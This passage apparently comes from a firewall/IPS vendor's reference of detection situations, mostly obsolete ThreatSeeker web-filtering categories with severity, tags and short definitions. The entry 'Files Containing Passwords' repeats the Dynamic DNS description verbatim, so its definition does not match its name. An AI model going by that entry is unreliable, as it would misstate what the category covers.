First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: TSheets is a time tracking application designed and engineered for companies across multiple industries that need to track, manage and report time. Utilizing web-based, cloud computing technology that integrates with multiple platforms, smartphones and software programs.
Back to top

TSP

About this situation: Tunnel Setup Protocol (TSP) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-680-5211
Description: Tunnel Setup Protocol (TSP) is a signalling protocol used to setup tunnel parameters between two tunnel end-points (e.g. tunnel client and tunnel broker/server).
Back to top

TS_Abortion

About this situation: ThreatSeeker Abortion
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites with neutral or balanced presentation of the issue.
Back to top

TS_Abused-Drugs

About this situation: ThreatSeeker Abused Drugs
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that promote or provide information about the use of prohibited drugs, except marijuana, or the abuse or unsanctioned use of controlled or regulated drugs; also, paraphernalia associated with such use or abuse.
Back to top

TS_Adult-Content

About this situation: ThreatSeeker Adult Content
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that display full or partial nudity in a sexual context, but not sexual activity; erotica; sexual paraphernalia; sex-oriented businesses including clubs, nightclubs, escort services; and sites supporting the online purchase of such goods and services.
Back to top

TS_Adult-Material

About this situation: ThreatSeeker Adult Material
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1649-5242
Description: Parent category that contains adult-oriented categories; may also contain age-restricted content.
Back to top

TS_Advanced-Malware-Command-and-Control

About this situation: ThreatSeeker Advanced Malware Command and Control
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Protects against outbound transmissions from a compromised machine to a malicious command-and-control center.
Back to top

TS_Advanced-Malware-Payloads

About this situation: ThreatSeeker Advanced Malware Payloads
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Protects against inbound network transmissions of payloads intended to exploit a machine.
Back to top

TS_Advertisements

About this situation: ThreatSeeker Advertisements
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide advertising graphics or other ad content files.
Back to top

TS_Advocacy-Groups

About this situation: ThreatSeeker Advocacy Groups
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that promote change or reform in public policy, public opinion, social practice, economic activities and relationships.
Back to top

TS_Alcohol-and-Tobacco

About this situation: ThreatSeeker Alcohol and Tobacco
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about, promote or support the sale of alcoholic beverages or tobacco products or associated paraphernalia.
Back to top

TS_Alternative-Journals

About this situation: ThreatSeeker Alternative Journals
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Online equivalents to supermarket tabloids and other fringe publications.
Back to top

TS_Application-and-Software-Download

About this situation: ThreatSeeker Application and Software Download
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable download of software, applications.
Back to top

TS_Bandwidth

About this situation: ThreatSeeker Bandwidth
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Educational Video, Entertainment Video, Internet Radio and TV, Internet Technology, Peer-to-Peer File Sharing, Personal Network Storage and Backup, Streaming Media, Surveillance and Viral Video.
Back to top

TS_Blog-Commenting

About this situation: ThreatSeeker Blog Commenting
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: General function that enables a user to post a comment.
Back to top

TS_Blog-Posting

About this situation: ThreatSeeker Blog Posting
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: General function that enables a user to post a blog entry.
Back to top

TS_Blogs-and-Personal-Sites

About this situation: ThreatSeeker Blogs and Personal Sites
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host blogs and personal sites.
Back to top

TS_Botnets

About this situation: ThreatSeeker Botnets
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host the command-and-control centers for networks of bots that have been installed onto users' computers. (Excludes web crawlers.)
Back to top

TS_Business-and-Economy

About this situation: ThreatSeeker Business and Economy
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or devoted to business firms, business associations, industry groups or general business.
Back to top

TS_Classifieds-Posting

About this situation: ThreatSeeker Classifieds Posting
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: General Function that enables a user to post a classified ad.
Back to top

TS_Collaboration-Office

About this situation: ThreatSeeker Collaboration - Office
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Office Category used to manage the Office domain:
Back to top

TS_Compromised-Websites

About this situation: ThreatSeeker Compromised Websites
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that are vulnerable and known to host an injected malicious code or unwanted content.
Back to top

TS_Computer-Security

About this situation: ThreatSeeker Computer Security
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or free downloadable tools for computer security.
Back to top

TS_Content-Delivery-Networks

About this situation: ThreatSeeker Content Delivery Networks
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Commercial hosts that deliver content to subscribing websites.
Back to top

TS_Cultural-Institutions

About this situation: ThreatSeeker Cultural Institutions
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by museums, galleries, theatres (but not movie theatres), libraries and similar institutions; also, sites whose purpose is the display of artworks.
Back to top

TS_Custom-Encrypted-Uploads

About this situation: ThreatSeeker Custom-Encrypted Uploads
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Outbound network transmissions of documents, payloads, and data that have been encrypted using custom encryption methods.
Back to top

TS_Drugs

About this situation: ThreatSeeker Drugs
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Abused Drugs, Marijuana. Nutrition and Prescribed Medications.
Back to top

TS_Dynamic-Content

About this situation: ThreatSeeker Dynamic Content
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: URLs that are generated dynamically by a web server.
Back to top

TS_Dynamic-DNS

About this situation: ThreatSeeker Dynamic DNS
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that mask their identity using Dynamic DNS services, often associated with advanced persistent threats (APTs).
Back to top

TS_Education

About this situation: ThreatSeeker Education
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Cultural Institutions, Educational Institutions, Educational Materials and Reference Materials.
Back to top

TS_Educational-Institutions

About this situation: ThreatSeeker Educational Institutions
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by schools and other educational facilities, by non-academic research institutions, or that relate to educational events and activities.
Back to top

TS_Educational-Materials

About this situation: ThreatSeeker Educational Materials
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or that sell or provide curriculum materials or direct instruction; also, learned journals and similar publications.
Back to top

TS_Educational-Video

About this situation: ThreatSeeker Educational Video
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host videos with academic or instructional content.
Back to top

TS_Elevated-Exposure

About this situation: ThreatSeeker Elevated Exposure
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that camouflage their true nature or that include elements suggesting latent malicious intent.
Back to top

TS_Emerging-Exploits

About this situation: ThreatSeeker Emerging Exploits
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites found to be hosting known and potential exploit code.
Back to top

TS_Entertainment

About this situation: ThreatSeeker Entertainment
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote motion pictures, non-news radio and television, books, humor and magazines.
Back to top

TS_Entertainment-Video

About this situation: ThreatSeeker Entertainment Video
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host videos with entertainment-oriented content.
Back to top

TS_Extended-Protection

About this situation: ThreatSeeker Extended Protection
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Dynamic DNS, Elevated Exposure, Emerging Exploits, Newly Registered Websites and Suspicious Content.
Back to top

TS_Facebook-Apps

About this situation: ThreatSeeker Facebook Apps
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to access or utilize an app.
Back to top

TS_Facebook-Chat

About this situation: ThreatSeeker Facebook Chat
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to chat within the Facebook community.
Back to top

TS_Facebook-Commenting

About this situation: ThreatSeeker Facebook Commenting
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to comment or like.
Back to top

TS_Facebook-Events

About this situation: ThreatSeeker Facebook Events
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to create, modify or respond to an event within the Facebook community.
Back to top

TS_Facebook-Friends

About this situation: ThreatSeeker Facebook Friends
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to add a connection.
Back to top

TS_Facebook-Games

About this situation: ThreatSeeker Facebook Games
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to access or play a game.
Back to top

TS_Facebook-Groups

About this situation: ThreatSeeker Facebook Groups
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to create, modify or join a group within the Facebook community.
Back to top

TS_Facebook-Mail

About this situation: ThreatSeeker Facebook Mail
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to send an email within the Facebook community.
Back to top

TS_Facebook-Photo-Upload

About this situation: ThreatSeeker Facebook Photo Upload
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to upload a photo.
Back to top

TS_Facebook-Posting

About this situation: ThreatSeeker Facebook Posting
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to share a post, status or link.
Back to top

TS_Facebook-Questions

About this situation: ThreatSeeker Facebook Questions
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to ask a question within the Facebook community.
Back to top

TS_Facebook-Video-Upload

About this situation: ThreatSeeker Facebook Video Upload
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Facebook function that enables a user to upload a video.
Back to top

TS_File-Download-Servers

About this situation: ThreatSeeker File Download Servers
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Web servers whose primary function is to deliver files for download.
Back to top

TS_Files-Containing-Passwords

About this situation: ThreatSeeker Files Containing Passwords
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that mask their identity using Dynamic DNS services, often associated with advanced persistent threats (APTs).
Back to top

TS_Financial-Data-and-Services

About this situation: ThreatSeeker Financial Data and Services
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer investment advice and news and quotations on stocks, bonds and other investment vehicles, but not online trading. Includes banks, credit unions, credit cards and insurance.
Back to top

TS_Gambling

About this situation: ThreatSeeker Gambling
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote gambling or support online gambling, involving a risk of losing money.
Back to top

TS_Games

About this situation: ThreatSeeker Games
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable a user to play or download a game.
Back to top

TS_Gay-or-Lesbian-or-Bisexual-Interest

About this situation: ThreatSeeker Gay or Lesbian or Bisexual Interest
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or cater to LGBT interests, but excluding those that are sexually or issue oriented.
Back to top

TS_General-Email

About this situation: ThreatSeeker General Email
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide email services open to general use.
Back to top

TS_Generative-AI-Conversation

About this situation: ThreatSeeker Generative AI - Conversation
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1649-5242
Last changed: sgpkg-ips-1649-5242
Description: Sites that specialize in machine-generated conversational content for the purpose of general information, user assistance or entertainment. Includes sites hosting virtual agents and narrow domain conversational applications using AI with ability to generate new content.
Back to top

TS_Generative-AI-Multimedia

About this situation: ThreatSeeker Generative AI - Multimedia
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1649-5242
Last changed: sgpkg-ips-1649-5242
Description: Sites that specialize in machine-generated multimedia content such as images, videos or audio. Includes sites that provide information, tools or services related to text-to-speech, video, music, sound or image editing applications using AI with ability to generate new content.
Back to top

TS_Generative-AI-Text-And-Code

About this situation: ThreatSeeker Generative AI - Text and Code
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-1649-5242
Last changed: sgpkg-ips-1649-5242
Description: Sites that provide machine-generated text with broad domain applications (including code and translation) using AI and generating new content. Includes sites that provide tools or services that make suggestions, edits, review or create summaries based on user prompts and interactions.
Back to top

TS_Government

About this situation: ThreatSeeker Government
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by branches, bureaus or agencies of any level of government, except for the armed forces.
Back to top

TS_Hacking

About this situation: ThreatSeeker Hacking
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote illegal or questionable access to or use of computer or communication equipment, software or databases.
Back to top

TS_Health

About this situation: ThreatSeeker Health
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information or advice on personal health or medical services, procedures, or devices, but not drugs. Includes self-help groups.
Back to top

TS_Hobbies

About this situation: ThreatSeeker Hobbies
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote private and largely sedentary pastimes, but not electronic, video or online games.
Back to top

TS_Hosted-Business-Applications

About this situation: ThreatSeeker Hosted Business Applications
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide access to business-oriented web applications and allow storage of sensitive data, excluding those for web collaboration.
Back to top

TS_Illegal-or-Questionable

About this situation: ThreatSeeker Illegal or Questionable
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide instruction in or promote nonviolent crime or unethical or dishonest behavior or the avoidance of prosecution.
Back to top

TS_Information-Technology

About this situation: ThreatSeeker Information Technology
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by or providing information about computers, software, the Internet and related business firms, including sites supporting the sale of hardware, software, peripherals and services.
Back to top

TS_Instant-Messaging

About this situation: ThreatSeeker Instant Messaging
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable instant messaging.
Back to top

TS_Internet-Auctions

About this situation: ThreatSeeker Internet Auctions
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that support the offering and purchasing of goods between individuals.
Back to top

TS_Internet-Communication

About this situation: ThreatSeeker Internet Communication
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: General Email, Organizational Email, Text and Media Messaging and Web Chat.
Back to top

TS_Internet-Radio-and-TV

About this situation: ThreatSeeker Internet Radio and TV
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide online radio or television programming.
Back to top

TS_Internet-Telephony

About this situation: ThreatSeeker Internet Telephony
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable users to make phone calls via the Internet or to obtain information or software for that purpose.
Back to top

TS_Intolerance

About this situation: ThreatSeeker Intolerance
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that condone intolerance towards any individual or group.
Back to top

TS_Job-Search

About this situation: ThreatSeeker Job Search
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer information about or support the seeking of employment or employees.
Back to top

TS_Keyloggers

About this situation: ThreatSeeker Keyloggers
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that download programs that record all keystrokes, and which may send those keystrokes (potentially including passwords or confidential information) to an external party.
Back to top

TS_Lingerie-and-Swimsuit

About this situation: ThreatSeeker Lingerie and Swimsuit
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer images of models in suggestive but not lewd costume, with semi nudity permitted. Includes classic 'cheesecake, calendar and pinup art and photography. Includes sites offering lingerie or swimwear for sale.
Back to top

TS_LinkedIn-Connections

About this situation: ThreatSeeker LinkedIn Connections
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: LinkedIn function that enables a user to add a connection.
Back to top

TS_LinkedIn-Jobs

About this situation: ThreatSeeker LinkedIn Jobs
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: LinkedIn function that enables a user to perform activities related to job search.
Back to top

TS_LinkedIn-Mail

About this situation: ThreatSeeker LinkedIn Mail
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: LinkedIn function that enables a user to send an email within the LinkedIn community.
Back to top

TS_LinkedIn-Updates

About this situation: ThreatSeeker LinkedIn Updates
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: LinkedIn function that enables a user to edit a profile or post an update.
Back to top

TS_Malicious-Embedded-iFrame

About this situation: ThreatSeeker Malicious Embedded iFrame
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites infected with a malicious iframe.
Back to top

TS_Malicious-Embedded-Link

About this situation: ThreatSeeker Malicious Embedded Link
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites infected with a malicious link.
Back to top

TS_Malicious-Websites

About this situation: ThreatSeeker Malicious Websites
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites containing code that may intentionally modify users' systems without their consent and cause harm.
Back to top

TS_Marijuana

About this situation: ThreatSeeker Marijuana
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote the cultivation, preparation or use of marijuana.
Back to top

TS_Media-File-Download

About this situation: ThreatSeeker Media File Download
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable download of media content.
Back to top

TS_Message-Boards-and-Forums

About this situation: ThreatSeeker Message Boards and Forums
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host message boards, bulletin boards and other unaffiliated discussion forums.
Back to top

TS_Militancy-and-Extremist

About this situation: ThreatSeeker Militancy and Extremist
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer information about or promote or are sponsored by groups advocating antigovernment beliefs or action.
Back to top

TS_Military

About this situation: ThreatSeeker Military
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites sponsored by branches or agencies of the armed services.
Back to top

TS_Miscellaneous

About this situation: ThreatSeeker Miscellaneous
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: Content Delivery Networks, Dynamic Content, File Download Servers, Network Errors, Private IP Addresses, Uncategorized, Web Images and Web Infrastructure.
Back to top

TS_Mobile-Malware

About this situation: ThreatSeeker Mobile Malware
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Protects against malicious websites and applications designed to run on mobile devices.
Back to top

TS_Network-Errors

About this situation: ThreatSeeker Network Errors
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: URLs with hosts that do not resolve to IP addresses.
Back to top

TS_Newly-Registered-Websites

About this situation: ThreatSeeker Newly Registered Websites
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites whose domain name was registered recently.
Back to top

TS_News-and-Media

About this situation: ThreatSeeker News and Media
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer current news and opinion, including those sponsored by newspapers, general-circulation magazines or other media.
Back to top

TS_Non-HTTP

About this situation: ThreatSeeker Non-HTTP
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: ThreatSeeker Non-HTTP
Back to top

TS_Non-Traditional-Religions

About this situation: ThreatSeeker Non-Traditional Religions
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about non-traditional religious beliefs and practices.
Back to top

TS_Nudity

About this situation: ThreatSeeker Nudity
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that offer depictions of nude or seminude human forms, singly or in groups, not overtly sexual in intent or effect.
Back to top

TS_Nutrition

About this situation: ThreatSeeker Nutrition
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about nutrition.
Back to top

TS_Office-Apps

About this situation: ThreatSeeker Office - Apps
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Office function that enables a user to collaborate via various applications.
Back to top

TS_Office-Documents

About this situation: ThreatSeeker Office - Documents
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Office function that enables a user to collaborate via document applications.
Back to top

TS_Office-Drive

About this situation: ThreatSeeker Office - Drive
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Office function that enables a user to collaborate via virtual storage.
Back to top

TS_Office-Mail

About this situation: ThreatSeeker Office - Mail
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Office function that enables a user to collaborate via email and messaging.
Back to top

TS_Online-Brokerage-and-Trading

About this situation: ThreatSeeker Online Brokerage and Trading
Context: HTTP ThreatSeeker Category
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that support active trading of securities and investment management.
Back to top

TS_Organizational-Email

About this situation: ThreatSeeker Organizational Email
Context: HTTP ThreatSeeker Category
